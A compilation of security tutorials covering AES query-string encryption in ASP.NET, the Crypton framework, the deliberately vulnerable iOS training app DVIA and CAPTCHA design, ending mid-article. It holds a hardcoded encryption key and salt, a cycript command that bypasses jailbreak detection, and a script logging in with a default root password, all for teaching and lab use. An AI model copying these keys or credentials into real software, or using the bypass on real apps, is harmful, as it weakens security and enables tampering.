The following ASP.NET page, which simply authenticates users by checking for a correct user ID and password, is created to demonstrate the real concept behind a "sensitive data via URL" disclosure incident. This page offers two ways of logging in: plain text or secure sign-in. Though it is optional, we are also showing the user's credential information on the redirected Welcome.aspx page, but there is a catch in the address bar as well. There is a possibility that a malicious hacker could intercept the traffic, and he can easily take advantage of the user information, as such data travels in the query string in clear text. This is the crucial vulnerability that we are going to pinpoint in this paper.

Securing Sensitive Data

This section describes the process of encrypting the data residing in a query string. The login form interface is designed in such a way that, if the user enables the Secure Sign-in check box, the encryption algorithm is activated behind the scenes and it is hard to anticipate what ciphered data will travel across the web pages in the query string. When the user proceeds with the "Secure Sign-in" option enabled, the following piece of code is activated and encrypts the sensitive portion of the URL. Here, the Encrypt() method takes the user name and password from the login form and performs the ciphering.
Later, the user is redirected to the welcome page via the query string mechanism:

string usr = HttpUtility.UrlEncode(Encrypt(txtUser.Text.Trim()));
string pwd = HttpUtility.UrlEncode(Encrypt(txtPwd.Text.Trim()));
Response.Redirect(string.Format("~/welcome.aspx?usrname={0}&password={1}", usr, pwd));

Developers usually protect the query string by invoking the UrlEncode method, which merely encodes characters so they can travel safely in a URL. Such encoding does not suffice and is trivially reversible. Hence, we applied double protection here: a custom encryption algorithm plus the UrlEncode method.

Query String Encryption

In this code segment, the real encryption of the query string parameters happens in the Encrypt() method implementation, which is called when the user clicks the "Sign-In" button. The query string values are first encrypted using the AES symmetric-key algorithm and are then sent to the welcome page, where they are first URL-decoded and then decrypted with AES, using the same symmetric key that was used for encryption on the login page. Encryption can be performed with either a symmetric key or an asymmetric key. In asymmetric-key cryptography, two keys are employed for encryption and decryption, but in this tutorial we rely on a symmetric key, in which a single key is used for both ciphering and deciphering the sensitive data.

Generating Secure Key (Symmetric)

The symmetric key could be anything, at the developer's discretion. Symmetric-key algorithms are very effective for processing large amounts of data and are less computationally intensive than asymmetric encryption algorithms. Here we hardcoded the symmetric key as "ajaykumar007," which serves both functions, as follows:

string password = "ajaykumar007";

It is recommended that the symmetric key be strong, with many alphanumeric characters, so it is hard to guess. A simple combination of words is always considered a weak key and is susceptible to dictionary attacks. There are plenty of methods for generating a secure key, such as the following code:

static String CreateKey(int numBytes)
{
    // Generate cryptographically random bytes.
    RNGCryptoServiceProvider rnd = new RNGCryptoServiceProvider();
    byte[] b = new byte[numBytes];
    rnd.GetBytes(b);
    return BytesToHexString(b);
}

static String BytesToHexString(byte[] bytes)
{
    StringBuilder hexString = new StringBuilder(64);
    for (int counter = 0; counter < bytes.Length; counter++)
    {
        hexString.Append(String.Format("{0:X2}", bytes[counter]));
    }
    return hexString.ToString();
}

We could use the aforesaid code to generate a random key programmatically, but we will move ahead with "ajaykumar007."

Generating Salt

Salt is typically random data that is used as supplementary input to a one-way function that hashes a passphrase or sensitive data. The salt and the password are concatenated and processed with a cryptographic hash function, and the resulting output (but not the original password) is stored with the salt in a database. The key purpose of salts is to protect against pre-computed rainbow table and dictionary attacks. It is not mandatory to keep the salt value secret. An attacker can never assume in advance what the salt will be, so a rainbow table or pre-computed lookup table is useless, because the salt value is generated randomly and the hash's value would be different each time.
Generally, we create random salt values by employing code like the following:

private static string CreateSalt(int size)
{
    // Generate a cryptographically random number.
    RNGCryptoServiceProvider rnd = new RNGCryptoServiceProvider();
    byte[] b = new byte[size];
    rnd.GetBytes(b);
    // Return a Base64 string representation of the random number.
    return Convert.ToBase64String(b);
}

Although the aforesaid code is the best fit for generating a raw salt value, it is a bit involved. Hence, we can also generate salt values by using an ASCII converter. The salt value can be anything, as we explained earlier. Just put any value in the plain-text box, for example "keyencrypt", and convert it into hexadecimal format. We have now generated the salt value that will be merged with the secret to encrypt the plain text, as shown below.

As we can observe from the figure above, the salt value is in hex form; now prefix "0x" to each hex byte, place them in a sequence, and assign this value to an array of the byte data type, which will be referenced in Rfc2898DeriveBytes later along with the secret key. Just remember one thing: the salt value must be the same during both encryption and decryption.

byte[] salt = new byte[] { 0x6B, 0x65, 0x79, 0x65, 0x6E, 0x63, 0x72, 0x79, 0x70, 0x74 };

Hashing Algorithm

We shall encrypt the query string parameters by employing the AES (Advanced Encryption Standard) algorithm, which is a variant of the Rijndael algorithm and which, of course, provides strong security and performance. AES reduces the number of parameters you have to configure and allows you to work at a very high level of abstraction. The AES algorithm is a symmetric-key block cipher that can use keys of 128, 192, and 256 bits; it encrypts and decrypts data in blocks of 128 bits. The following image shows the entire life cycle of encrypting the query string and decrypting it at the receiving site.

Okay, we now have all the ingredients for encryption: a query string, a secret key, and a salt value. In the Encrypt() method, the key derivation class Rfc2898DeriveBytes repeatedly hashes the password along with the salt to derive the AES key and IV:

string password = "ajaykumar007";
..
using (Aes encryptor = Aes.Create())
{
    byte[] salt = new byte[] { 0x6B, 0x65, 0x79, 0x65, 0x6E, 0x63, 0x72, 0x79, 0x70, 0x74 };
    Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, salt);
    ..
    encryptor.Key = pdb.GetBytes(32);
    encryptor.IV = pdb.GetBytes(16);
    ..
}

Testing

Everything has been put in place in the Encrypt() method so far. Now run the project, enter some login information, and enable the "Secure Sign-in" check box. The user will be redirected to the Welcome.aspx page; notice the query string parameter value. It is encrypted and unreadable to an onlooker. For our convenience, we are also displaying the query string value (login data) on the welcome.aspx page, as shown below.

Query String Decryption

As you have seen in the previous figure, the query string is also displayed on the page in encrypted form, and that form provides the facility to decrypt the ciphered values. This section showcases that mechanism via the Decrypt() method, which is called when the user clicks the Decrypt button. Here we need two things: the key that was used to encrypt the query string parameters, and the salt. Neither must be tampered with, or decryption won't happen.
private string Decrypt(string cipherText)
{
    string password = "ajaykumar007";
    byte[] cipherBytes = Convert.FromBase64String(cipherText);
    using (Aes encryptor = Aes.Create())
    {
        byte[] salt = new byte[] { 0x6B, 0x65, 0x79, 0x65, 0x6E, 0x63, 0x72, 0x79, 0x70, 0x74 };
        Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, salt);
        encryptor.Key = pdb.GetBytes(32);
        encryptor.IV = pdb.GetBytes(16);
        using (MemoryStream ms = new MemoryStream())
        {
            ..
        }
    }
    ..
}

This time, click the Decrypt button and the web page will display the deciphered value that was entered on the login form and passed through the query string, as shown below.

Vulnerability and Redemption

This paper has demonstrated the generation of a persistent symmetric key and its use with the AES algorithm to encrypt and decrypt sensitive URL data. However, although the data in the query string is successfully encrypted, this approach is still vulnerable to replay, MITM, and brute-force attacks. Sensitive credentials still pass in clear text at some point, even though the query string is encrypted via the AES algorithm. A smart hacker can easily steal the user name and password via session hijacking, since HTTPS is not applied. The real problem here is that the user name and password are still transmitted in plain text at least once to the server, and then the encrypted strings are passed back to the client. Those strings can be picked up off the wire and used in a replay attack. The following measures should be applied to fix the aforesaid problems:

HTTPS: we have to install a digital certificate on the server in order to protect the communication traffic between client and server.

POST Method: data that travels to the server via a query string using the GET method is always vulnerable to sniffing or hijacking. Hence, it is a good idea to use the POST method rather than the GET method in such a scenario.

Secure Session Management: proper, secure session management should be used in order to foil man-in-the-middle and session hijacking attacks.

Encryption of XML Data: data residing in an XML file is always in clear text, so it is not recommended to store crucial data in XML files.

Final Word

In this article, we have pinpointed the vulnerability of encoding query string parameters with weak cryptographic methods, where the data travels across the network in clear text and is susceptible to MITM attacks. We have showcased the scenario and the glitches that are often created by programmers or developers during the encryption and decryption of sensitive URL data using symmetric-key encryption with the AES algorithm. Finally, we have seen the actual problems of applying weak cryptographic methods, as well as the remedies.

Source
-
1. Introduction to the Problem

Crypton is an open-source project provided by SpiderOak with the purpose of solving privacy and security problems in cloud applications. Before introducing the solution, we must first talk about the problem. The main problem with cloud-based applications is that the user's data is stored in the cloud and can therefore be accessed and read by anyone having access to the server, namely the cloud service provider (CSP). Not to mention that, if an attacker were able to penetrate the CSP's defenses, he might also be able to access the clients' data. That being said, Crypton is a framework that can be used for building cryptographically secure cloud applications, which means that the client's data is stored in the cloud in encrypted form, and only the client possesses the knowledge to decrypt it. Crypton does all the cryptography behind the scenes, so developers don't have to bother with it. If everybody tried to use their own cryptographic methods to provide zero-knowledge cloud-based applications, there would definitely be discrepancies, probably some more vulnerable than others, but none would fit the profile perfectly.

2. Presenting the Solution

With Crypton, we can build secure cloud-based applications where all the encryption and decryption of the client's data is done on the client side of the communication, before the data is actually sent to the cloud. This results in encrypted data being stored in the cloud. Depending on how we program the application, all of the data stored in the cloud can be encrypted. Of course, it's not always necessary to encrypt everything, because sometimes it may be more efficient to work with unencrypted data. Some of the data isn't so important that it needs to be encrypted and, by not encrypting it, we save the CPU cycles that would normally be spent on encryption and decryption. There are also server-side optimizations that can be done on unencrypted data but not on encrypted data, such as searching through the data itself. If we would like to do a simple search over encrypted data in the cloud, all the data must be sent to the client, where it is decrypted, after which the search algorithm can do its job. That means the whole database needs to be sent over the network, consuming bandwidth, before a single search through the data can be done.

Note that the Crypton documentation states that Crypton is not yet ready for production environments [1], but hopefully we'll spread the word around the Internet to attract more developers who are willing to test it and possibly contribute.

3. Crypton Diary Overview

Let's now take a look at the Crypton Diary example application, which was written with security in mind. The Diary application uses Crypton to encrypt the user's data and is accessible at https://diary.crypton.io/, which is presented in the picture below. We can see that there is an input form where we can enter our username and password. There's also a login button, which logs us into the application, and a register button, which allows a new account to be registered. Let's first create a new account by entering crypton:crypton into the username and password input fields. When we press the register button, the cryptographic keys are automatically created and we're logged into the application. In the picture below, we can see the Diary application once we've logged in.
There is an input box where we can input some text about our life. To save the message, we press the "Save" button; to delete the message, we press the "Delete" button. The menu contains two buttons: "Entries," which lists all the saved message entries, and "Create," which creates a new message entry. Let's input a new message, "Hello, this is my first entry." and save it. Once the message has been saved, we can see it if we click on the "Entries" menu button, which presents entries based on when we saved them. There is currently just one message, which was saved 1 minute ago. Let's now create a second entry with the text: "Now I've gotten used to the Diary application and I'm wondering whether my messages are encrypted when saved to the cloud?" as shown below:

Now there are two messages presented if we enter the "Entries" menu again.

This is the basic usage of the application. If you've followed the article, you can see that we're already wondering whether the messages are being stored in encrypted form. This is a valid and important question that we're trying to address in this article. Just from using the web application normally, we don't know the answer, because we haven't programmed the application ourselves: for all we know, the messages might be stored in clear text. There is a simple check that we can use to confirm whether the messages are secure: we can start an intercepting proxy, catch the messages being sent to the server, and see for ourselves. If we start Wireshark, we won't get any meaningful results, because the messages are transmitted over HTTPS, which uses an encrypted layer. Rather than trying to figure out how to see decrypted HTTPS messages in Wireshark, let's start the Burp intercepting proxy and look at the messages in clear text. The picture below presents a request being sent to the server once we save a Diary message.

Notice that we're dealing with a POST request going to https://diary.crypton.io/transaction/1528. The request body contains a JSON message, which describes a single transaction with the following fields: type, containerNameHmac, and payloadCiphertext. The payloadCiphertext field contains the encrypted version of our payload, which confirms that an encrypted version of the text is being stored in the cloud. Of course, there are still ways in which the application could read the plain text of our encrypted messages: when we registered, the application could have stored our password in clear text and used it to decrypt our messages. In the remainder of the article, we'll try to find out whether this is true or not, so bear with me here.

4. Getting Crypton

To get Crypton, we must first install all the dependencies mentioned in [1]; basically, we need to install the git revision control system, the PostgreSQL database, and the Node.js JavaScript runtime. After all dependencies have been successfully installed, we can clone the Crypton repository from the SpiderOak GitHub profile and build it with make. Note that Crypton uses the following Node.js libraries; we need to be aware of them when developing a cryptographically secure application with Crypton:

Karma—a tool that allows us to execute JavaScript in web browsers.
Mocha—a simple JavaScript test framework.
Mockery—provides a simple, easy-to-use API that we can use to hook mocks.
Should—an assertion library.
Uglify—a JavaScript parser and beautifier library.
Bcrypt—an implementation of the bcrypt password-hashing algorithm.
Commander—provides a command-line interface.
Redis—a client to connect to the Redis NoSQL database.
Cors—a library for enabling cross-origin resource sharing in web applications.
Express—a web application framework.
Node-UUID—generates universally unique identifiers.
Sinon—a test framework.
Colors—provides colors in the console.
Connect—an HTTP server framework.
Cookie—for cookie management.
Cryptojs—provides various secure cryptographic algorithms.
Lusca—provides application security for Express.
PG—a PostgreSQL client.
Socket.IO—provides a web socket API for real-time applications.

We must also install a Redis server with version > 2.6, which we can do with the commands below. I'm specifically mentioning these commands because otherwise you'll end up with an older version of Redis.

# sudo apt-get install -y python-software-properties
# sudo add-apt-repository -y ppa:rwky/redis
# sudo apt-get update
# sudo apt-get install -y redis-server

Prior to cloning and installing the Crypton repository, you should also download and install the latest version of Node.js. We won't go into the steps now, since they are properly documented on the [1] website. Finally, we should clone the Crypton repository from GitHub and enter the created directory.

# git clone -b sharing https://github.com/SpiderOak/crypton/ crypton
# cd crypton/

Once we're in the Crypton directory, we must first run the "check_dependencies.sh" script, which verifies that every dependency has been properly installed. After that, we can simply run make, which reads the Makefile in the directory and executes the commands written in it. Basically, the Makefile runs the make command in the client/, server/ and integration_tests/ directories, which contain their own Makefiles. Note that I wasn't able to successfully build Crypton by running make in its base directory; I had to enter the server/ and client/ directories and manually run the make command in each of them. In the server directory, we also have to run the "sudo npm link" command to create the proper system symbolic links so that the crypton executable is in PATH and can be executed from anywhere. On an Ubuntu system, the /usr/local/bin/crypton symlink is created. In the client directory, we also have to execute the make command. If you receive the following error, it means that karma cannot be found:

# make
cat src/core.js src/account.js src/session.js src/container.js src/transaction.js src/peer.js src/message.js src/diff.js src/vendor/*.js > dist/crypton.js
make: ./node_modules/.bin/karma: Command not found
make: *** [test-unit] Error 127

To solve the error, we need to install karma manually with npm install and link to its binary executable with the commands below:

# cd client/
# npm install karma
# cd node_modules/.bin/
# ln -sf ../karma/bin/karma .
# cd -
# make

In this article, we'll present the Diary example, for which we need to enter the client/examples/diary/ directory and start Crypton. Because Crypton will start a web server listening on privileged port 443, we need to invoke it with sudo privileges.
Below, we can see that the HTTPS server was successfully started and is listening on port 443:

# sudo crypton
[info] loading config
[info] config file not specified, using example
[info] loading datastore
[debug] listening for container updates
[info] configuring server
connect.limit() will be removed in connect 3.0
connect.multipart() will be removed in connect 3.0
visit https://github.com/senchalabs/connect/wiki/Connect-3.0 for alternatives
connect.limit() will be removed in connect 3.0
[info] loading routes
[info] starting HTTPS server
[info] HTTPS server listening on port 443
[info] starting socket.io
info - socket.io started

After that, we can visit the web page where the Crypton Diary application is now running, as seen below.

Crypton Diary Internals

In the previous section, we saw how to get Crypton and how to run the Crypton Diary application. Now we'll take a look behind the curtains to see how the information is stored on the server side. Let's first see how the Redis database is used. We can connect to the database with the redis-cli command and then enter arbitrary Redis commands. We can execute "keys *" to display all keys currently stored in the database. Prior to actually connecting to Crypton Diary with our web browser, there are no keys stored in the Redis database, as can be seen below:

# redis-cli
127.0.0.1:6379> keys *
(empty list or set)

After we enter the Crypton Diary web address in a web browser and connect to the website, a new key for our session is created. Our session key below is "crypton.sid:to3U1feDnhB5tr1kwXhXxQVq". The first mget command displays the value of our session key before we have authenticated to the Diary application, and the second mget command displays the value of the session key after successful authentication. Notice that once we have authenticated to the web application, an accountId is added to the JSON value stored in our session key; this binds our account to the session key.

127.0.0.1:6379> keys *
1) "crypton.sid:to3U1feDnhB5tr1kwXhXxQVq"
127.0.0.1:6379> mget "crypton.sid:to3U1feDnhB5tr1kwXhXxQVq"
1) "{"cookie":{"originalMaxAge":null,"expires":null,"secure":true,"httpOnly":true,"path":"/"}}"
127.0.0.1:6379> mget "crypton.sid:to3U1feDnhB5tr1kwXhXxQVq"
1) "{"cookie":{"originalMaxAge":null,"expires":null,"secure":true,"httpOnly":true,"path":"/"},"accountId":15}"

If we save an entry, the contents of the Redis DB will not change, because the actual data is stored in the PostgreSQL database. When we think about it, it makes sense to store only session data in the Redis DB, since the contents of the Redis database are kept in memory and do not persist across restarts; it would be a shame if our Diary entries were lost because the Redis database was wiped out upon a service restart. Therefore, all the data needs to be stored on an actual hard drive in the PostgreSQL database. We can connect to the PostgreSQL database by using the psql command. Remember that, by default, the PostgreSQL user on Ubuntu has a blank password, so we should be able to connect to the DB without entering one. In the output below, we've connected to the PostgreSQL crypton_test database and displayed all tables with the \dt command.
# sudo -u postgres psql
postgres=# \connect crypton_test
crypton_test=# \dt
 public | account                                         | table | crypton_test_user
 public | base_keyring                                    | table | crypton_test_user
 public | container                                       | table | crypton_test_user
 public | container_record                                | table | crypton_test_user
 public | container_session_key                           | table | crypton_test_user
 public | container_session_key_share                     | table | crypton_test_user
 public | message                                         | table | crypton_test_user
 public | transaction                                     | table | crypton_test_user
 public | transaction_add_container                       | table | crypton_test_user
 public | transaction_add_container_record                | table | crypton_test_user
 public | transaction_add_container_session_key           | table | crypton_test_user
 public | transaction_add_container_session_key_share     | table | crypton_test_user
 public | transaction_add_message                         | table | crypton_test_user
 public | transaction_delete_container                    | table | crypton_test_user
 public | transaction_delete_container_session_key_share  | table | crypton_test_user
 public | transaction_delete_message                      | table | crypton_test_user

Let's create another user by registering the temp:temp account. The user should be stored in the account table, which contains the following information after the creation of the new user. Notice that no password is stored anywhere, nor is any password hash.

crypton_test=# select * from account;
 account_id | creation_time              | username | base_keyring_id | deletion_time
------------+----------------------------+----------+-----------------+---------------
 1          | 2014-03-17 12:41:15.118183 | pizza    | 2               |
 4          | 2014-03-17 12:41:17.473174 | testuser | 5               |
 17         | 2014-03-17 12:54:25.929092 | temp     | 18              |

We can also search through the PostgreSQL database, and we won't be able to find any message entered through the Diary application in clear-text form; everything is encrypted as it should be, which gives us the confirmation we've been looking for.

We've also mentioned that Crypton still has a long way to go, because it's a young project indeed. One problem occurs if we enter "admin)',\nname:" as our username. At that point, the "logging in" message is displayed on the screen indefinitely. After a while, the user might realize that the application has stopped working and close the browser tab. If we look at the messages being logged in the background, we can see the following request, where it's evident that the request returned a 404 Not Found status. This is because every backslash '\' character is transformed into a normal slash '/' character, thus changing the URL structure. The same happens if we input a normal slash, which is not transformed but still changes the URL format.

info 404 POST /account/admin)',/nname:

The application expects that after /account/ comes the name of the user, followed by an optional slash, but in our case we're actually adding another element to the URL, which the application doesn't recognize. In this use case, the application should notify us that we should not be using special characters in the username, if special characters are indeed not valid. In case the application wants to allow special characters as part of the username, they should be properly encoded.
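As a sketch of that last point, this is roughly what proper encoding of such a username could look like on the client side. The snippet is an illustration in Python rather than Crypton's actual JavaScript code, and the fix itself is hypothetical; percent-encoding simply guarantees that slashes and backslashes cannot alter the URL structure.

from urllib.parse import quote

# The problematic username from the test above, containing a literal backslash.
username = "admin)',\\nname:"

# safe="" also encodes '/', so no character can add a new URL path element.
url = "https://diary.crypton.io/account/" + quote(username, safe="")
print(url)  # .../account/admin%29%27%2C%5Cname%3A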
We've also mentioned that Crypton still has a long way to go, because it's a young project indeed. One problem occurs if we enter "admin)',\nname:" as our username. At that point the "logging in" message is displayed on the screen indefinitely. After a while, the user might realize that the application has stopped working and close the browser tab. If we look at the messages being logged in the background, we can see the following request, where it's evident that the request returned a 404 Not Found message. This is because every backslash '\' character is transformed into a normal slash '/' character, thus changing the URL structure. The same happens if we input the normal slash, which is not transformed, but still changes the URL format.

info 404 POST /account/admin)',/nname:

The application accepts that after /account/ comes the name of the user followed by an optional slash, but in our case we're actually adding another element to the URL, which the application doesn't recognize. In this use case, the application should notify us that we shouldn't be using special characters when inputting the username, if special characters are indeed not valid. In case the application wants to allow special characters as part of the username, they should be properly encoded.

Conclusion

We've seen that Crypton is a great project that can take care of security for us when building a cloud application, because it automatically encrypts/decrypts the messages for us, so we can store them in a cloud without revealing any information to the CSP. At this point, I would like to thank SpiderOak for releasing such a great project to open source, and all current developers for doing a good job. Crypton still has a long way to go, so any help from other developers around the world is appreciated and will be gladly accepted. We need to strive toward a safer future, where our data is securely and privately stored in the cloud by being encrypted, and Crypton is one way of achieving it.

References

[1] Crypton, Getting Started, https://crypton.io/getting-started.

Source
-
In this article, I will write about how to get started with Damn Vulnerable iOS Application. Damn Vulnerable iOS App (DVIA) is an iOS application that I wrote to provide a platform for mobile security enthusiasts, professionals and students to test their iOS penetration testing skills in a legal environment. This application covers all the common vulnerabilities found in iOS applications (following the OWASP top 10 mobile risks) and contains several challenges that the user can try. Every challenge is coupled with an article that users can read to learn more on that topic. This application can also be used by absolute beginners in iOS application security, as the tutorials that come with DVIA are written with beginners in mind. Users can also buy a comprehensive guide of solutions for DVIA if they want. DVIA is also open source and its Github page can be found here.

Installing DVIA

Note: DVIA only supports iOS 7 devices; older versions of iOS are not supported. DVIA also supports 64-bit devices. Please make sure to download the latest version of DVIA.

The very first thing to do is set up an iOS pen-testing environment on your iOS device. You can audit DVIA using the simulator as well, but I would recommend trying it out on a device. You can read articles about setting up a pen-testing environment for iOS 7. Once you have set up the environment, there is a very good video created by Kyle Levin where he talks about multiple ways of installing DVIA on your device. In any case, here are the text instructions for installing DVIA on your device. You can jump to the next section on Exploring DVIA if you have already installed it on your device.

Running on System or Device using Xcode

Download the latest source code of Damn Vulnerable iOS Application from here. Note that you will need to have Xcode installed on your computer to build this application. Once you have installed the latest version of Xcode, you can just run the application on your computer by using Xcode and do all the analysis on the simulator if you want. Please open DamnVulnerableIOSApp.xcworkspace to run the project. Don't use the file DamnVulnerableIOSApp.xcodeproj, as the build will fail. This is because DVIA uses Cocoapods. To run the application on your system using the iOS simulator, just run the application (Cmd + R) after selecting the target and the application will install on the simulator. To install and run the application on your device using the source code, you need to have a valid provisioning profile. This requires purchasing the iOS developer program, which comes at a cost of $99/year. Go to the DVIA Project, select your Target -> Settings -> Code Signing and make sure the proper Code Signing identity and Provisioning profile are selected.

Copying the .app file on device and using uicache

Download the .ipa file from the downloads page, change its name from DamnVulnerableIOSApp.ipa to DamnVulnerableIOSApp.zip and unzip this file. This will unzip to a folder named Payload. Inside it, there will be a file named DamnVulnerableIOSApp.app. Then copy the .app file to the /Applications directory on the device using scp. You can also use sftp or the utility iExplorer to upload this application. Now log in as the mobile user, use the command su to get root privileges and give the DVIA binary executable permissions. Then use the exit command to go back to the mobile user, and use the command uicache to install the application. If this doesn't work, you can reboot the device or try this method again.
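The whole copy-and-uicache sequence can also be scripted from your computer. Below is a rough Python sketch using paramiko over the device's OpenSSH; the device IP is hypothetical and the default root password "alpine" of jailbroken devices is an assumption you should verify (and change!). Note that sftp has no recursive put, hence the os.walk loop over the .app bundle:

import os
import posixpath
import paramiko  # pip install paramiko

DEVICE = "192.168.1.10"   # hypothetical device IP on your WiFi
APP_SRC = "Payload/DamnVulnerableIOSApp.app"
APP_DST = "/Applications/DamnVulnerableIOSApp.app"

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(DEVICE, username="root", password="alpine")  # default jailbreak credentials
sftp = ssh.open_sftp()

# upload the bundle file by file, recreating the directory layout
for root, dirs, files in os.walk(APP_SRC):
    rel = os.path.relpath(root, APP_SRC)
    remote = APP_DST if rel == "." else posixpath.join(APP_DST, rel.replace(os.sep, "/"))
    try:
        sftp.mkdir(remote)
    except IOError:
        pass  # directory already exists
    for name in files:
        sftp.put(os.path.join(root, name), posixpath.join(remote, name))

ssh.exec_command("chmod +x " + APP_DST + "/DamnVulnerableIOSApp")
ssh.exec_command("su mobile -c uicache")  # uicache must run as the mobile user
ssh.close()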
Using IPA Installer

This requires a device running iOS 7 with AppSync installed. Please note that we don't promote the use of AppSync, and hence this method should only be used as a last alternative. Download the latest IPA of Damn Vulnerable iOS Application here. One of the ways to install the application is by using the terminal utility IPA Installer Console. Make sure you install it on your device. Now sftp into your device and upload the IPA file that we have just downloaded. Then use the command "ipainstaller DamnVulnerableIOSApp.ipa" or "installipa DamnVulnerableIOSApp.ipa" to install the application on your device.

Using AppSync

Make sure AppSync is installed on your device. To install AppSync on your device, follow these steps.

Launch the Cydia app on your device
Select Manage
Select Sources
Select Edit
Select Add
Add the source repo.hackyouriphone.org
Now search for AppSync
Install AppSync for iOS 7+

Now double-click on the ipa file that you just downloaded on your computer. This will add the application to iTunes. Now go to iTunes, select the install option on the DVIA application and sync it to your device. This will install the application on your device.

Exploring DVIA

DVIA comes loaded with a lot of challenges covering most of the common vulnerabilities found in iOS applications. The current list of vulnerabilities and challenges includes:

Insecure Data Storage
Jailbreak Detection
Runtime Manipulation
Transport Layer Security
Client Side Injection
Information Disclosure
Broken Cryptography
Application Patching
Security Decisions via Untrusted Input
Side Channel Data Leakage

You can just swipe from the left in the application and see a list of vulnerabilities and challenges you can have a go at. Since almost every vulnerability comes with a related tutorial, you can read it to learn more about that specific vulnerability before attempting the challenge.

Auditing DVIA

Well, let's try and solve some challenges. You can audit DVIA both on a device and on the simulator; however, I would recommend you do all the auditing on a device. Let's open up the Client Side Injection section, enter a random name, say Apple, and press enter. The first challenge is to show a simple alert with injection. It is clear from the above image that the text is added to a UIWebView. If this input is not validated properly, we might be able to inject some JavaScript that will get executed in the UIWebView. Let's enter the following as the input. Awesome, it looks like the injection worked. For the other challenges, you can use JavaScript to call native functions on the device. Well, how do you do that? Let me give you a hint: read about URL schemes and what they are used for.

Now let's move on to some other challenges. Let's have a look at the Jailbreak Detection section and try to solve the first challenge. Our task is to fool the application into thinking that it is not jailbroken even though we are running the application on a jailbroken device. So let's ssh into the device and dump the class information for this application by navigating to the folder where the application binary is located and using the command class-dump DamnVulnerableIOSApp. Looks like this method is the one that is used to check whether a device is jailbroken or not. If we modify the implementation of this method to return NO, then our task will be accomplished. Let's use cycript to overwrite this method's implementation. First, let's hook into the application by finding the process ID of the application and using the command cycript -p PID.
Make sure the application is running in the foreground or we won't be able to hook into it. Now modify the implementation by using the following command in the cycript interpreter.

JailbreakDetectionVC.messages['isJailbroken'] = function () {return NO};

And now, if you tap on the button Jailbreak Test 1 in the application, you will see that the alert says the device is not jailbroken, even though the device I am currently running the application on is actually jailbroken. Similarly, you can try other challenges in the application as well. As I said before, DVIA is open source; however, I assume that when you audit the application to solve challenges, you do a black-box audit and don't look at the source code. If you are unable to solve some challenges, you can buy the solutions. The proceeds from this purchase support the DVIA project and give us dedicated time to improve the application, add new challenges, etc. Any feedback or comments about the application are welcome. My next aim is to add more challenges and vulnerabilities to DVIA as time progresses. I hope you enjoy using and learning from DVIA as much as I enjoyed developing it.

Source
-
Automated tools are used to carry out many security attacks on online services. There are different protection mechanisms to narrow down such attacks, and one such mechanism is the usage of CAPTCHA. CAPTCHA, or Completely Automated Public Turing test to tell Computers and Humans Apart, is a mechanism adopted by many web servers to limit automated access. The term "CAPTCHA" was coined in 2000 by Luis von Ahn, Manuel Blum, and Nicholas J. Hopper of Carnegie Mellon University, and John Langford of IBM. CAPTCHAs are challenge-response tests used to ensure that the users are indeed human. The purpose of a CAPTCHA is to block form submissions from spam bots – automated scripts that harvest email addresses from publicly available web forms. A common kind of CAPTCHA used on most websites requires the users to enter a string of characters that appears in a distorted form on the screen. CAPTCHAs are used because it is difficult for computers to extract the text from such a distorted image, whereas it is relatively easy for a human to understand the text hidden behind the distortions. If a CAPTCHA is solved successfully, then it is assumed that the user is human and not a bot. Even if a bot succeeds in solving one CAPTCHA, there is no guarantee that it will be successful the next time, since CAPTCHAs are chosen from a wide variety of selections.

Many websites use CAPTCHA to tell computers and humans apart in an attempt to block automated interactions with their sites. These efforts may be crucial to the success of these sites in various ways. For example, Gmail improves its service by blocking access to automated spammers, eBay improves its marketplace by blocking bots from flooding the site with scams, and Facebook limits creation of fraudulent profiles used to spam honest users or cheat at games. The most widely used CAPTCHA schemes use combinations of distorted characters and obfuscation techniques that humans can recognize but that may be difficult for automated scripts.

1. How to create a CAPTCHA

To create a CAPTCHA, first look at the different ways humans and machines process information. If something falls outside the structure of a computer's instructions, the computer is not capable of processing it. In the case of reCAPTCHA, an Optical Character Recognition (OCR) system can be used to read the letters from books and store them in a database. The OCR then reports the words that it cannot read correctly, and these words are given to users to fill in the CAPTCHA. Another way to create a CAPTCHA is to pre-determine the images and solutions it will use. This approach requires a collection of CAPTCHA solutions that covers all the different varieties. If a spammer managed to find a list of all CAPTCHA solutions, an application could be created to brute-force the CAPTCHA with every possible match, so such a database needs to contain well over 10K different CAPTCHAs to stay within the boundary line of a good CAPTCHA.

2. CAPTCHA Implementation

These are the simple guidelines that must be followed for CAPTCHA implementation.

Embeddable CAPTCHAs

The easiest way to add a CAPTCHA to a website is to insert a few lines of CAPTCHA code into the website's HTML code. An open source CAPTCHA builder can be used which will provide the authentication services remotely. One of the most popular among them is the reCAPTCHA project.
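If you're rolling your own instead of embedding a remote service, the generation step can be as simple as the following hedged Python sketch using Pillow (the font path is an assumption; point it at any TrueType font on your system). The returned string is the answer that, as the next section explains, must be kept server-side only:

import random
import string
from PIL import Image, ImageDraw, ImageFont, ImageFilter  # pip install Pillow

def make_captcha(length=6, path="captcha.png"):
    text = "".join(random.choice(string.ascii_uppercase) for _ in range(length))
    img = Image.new("RGB", (200, 70), "white")
    draw = ImageDraw.Draw(img)
    # assumed font path; substitute any .ttf file available locally
    font = ImageFont.truetype("/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf", 36)
    # draw each letter with a small random vertical offset
    for i, ch in enumerate(text):
        draw.text((10 + i * 30, 10 + random.randint(-5, 5)), ch, fill="black", font=font)
    # add clutter lines as a (very mild) background obfuscation
    for _ in range(8):
        draw.line([(random.randint(0, 200), random.randint(0, 70)),
                   (random.randint(0, 200), random.randint(0, 70))], fill="gray")
    img = img.filter(ImageFilter.SMOOTH)  # real schemes warp much harder than this
    img.save(path)
    return text  # the answer to store server-side, never in the form itself

answer = make_captcha()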
CAPTCHA Logic

First some random text is generated, random effects are applied to it, and it is converted into an image. The original text, which is the correct answer to the converted image, is stored somewhere – as a server-side session variable, cookie, file, or database entry. The generated CAPTCHA is presented to the user, who is prompted to submit the answer. Then a back-end script checks the answer supplied by the user by comparing it with the stored original text. If the value is empty or incorrect, a new CAPTCHA is generated; it must be ensured that users don't get a second chance to answer the same CAPTCHA. If the answer supplied by the user is correct, then the form post is marked as successful and processing can continue. If applicable, the generated CAPTCHA image is deleted.

Accessibility

